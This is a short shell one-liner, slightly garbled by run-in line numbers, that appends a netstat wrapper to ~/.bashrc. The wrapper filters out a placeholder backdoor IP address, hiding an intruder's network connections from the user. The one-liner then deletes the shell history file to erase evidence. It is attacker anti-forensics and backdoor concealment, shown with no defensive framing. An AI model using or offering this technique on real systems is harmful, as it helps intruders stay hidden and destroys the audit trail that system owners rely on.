1echo "function netstat() { 2 command netstat "$@" | grep -v #BACKDOOR_IP_TO_CAMOUF 3} 4" >> ~/.bashrc; rm $HISTFILE; exit 5